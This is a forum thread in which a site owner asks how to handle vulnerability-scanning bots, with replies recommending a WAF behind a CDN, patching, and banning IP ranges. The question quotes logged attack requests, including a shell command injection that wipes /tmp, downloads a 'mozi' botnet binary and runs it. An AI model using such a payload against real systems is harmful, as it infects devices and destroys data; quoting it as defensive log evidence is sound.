Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
R
R
ramiil2021-09-10 11:35:59
linux
ramiil, 2021-09-10 11:35:59

What to do with hacker http requests?

I have a small site, and lately various http requests that are not related to the content of the site have begun to come to it, for example


get wp-login.php
get /gponform/diag_form?images/
get /shell?cd+/tmp;rm+-rf+*;wget+ 192.168.1.1:8088/mozi.a;chmod+777+mozi.a;/tmp/mozi ...


Obviously, these are attackers and their bots scanning the site in search of vulnerabilities. The question is what to do with them? I wrote a script that bans them from iptables, maybe there are sites that keep ban lists or signatures/regexps to detect malicious requests?

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

4 answer(s)
Report
A
Alexander, 2021-09-10
@AleksandrB

To score, you can’t ban everyone, but if you want, you can ban real users.
Well, just do not leave such vulnerabilities.

Report
M
Mnemonic0, 2021-09-10
@Mnemonic0

WAF - this will help you. Bans by ip / regions are like blocking / 8 networks when trying to block Telegram.
In short - you hide behind a CDN (Cloudfront for example) and set up AWS WAF verification in it - 95% of all hacking attempts will be closed.
The remaining 5% will be much more expensive to close, it all depends on the money that will be lost from the downtime of the site.

Report
S
Satisfied IT, 2021-09-10
specialist @borisdenis

Decide on the target audience, if it is the Russian Federation, then we do not need access from other countries and we can safely ban the subnets of America, etc..
At least ban the subnets of China, from there the most inadequate requests are constantly coming.
You can also send known output nodes of the torus
to the ban list. Send to the ban list of the Amazon server and the like.
The volume of any garbage will be reduced significantly, the main thing is not to ban the right one)))

Similar questions
C
chuhnevdan2021-04-13 09:38:42
Hello, I have a Django project, the task is the following, there is a csv file, it is necessary to create a table on the page based on it, what is the mistake? 2Reply
A
Abraham Chanski2019-07-20 20:22:33
When setting up ssh in Kali linux, I get the error "resque-ssh.target is a disabled or a static unit l, not starting it", what should I do? 0Reply
W
waltaki2019-07-21 16:38:17
Top how to get output in bytes? 2Reply
E
Evgeny Petryaev2019-07-21 18:27:47
Will mysql server fit on Linux? 1Reply
S
StereoTerra2017-02-23 02:03:29
Why hangs on loading the output of the logo and progress bar when booting from a USB flash drive? 1Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question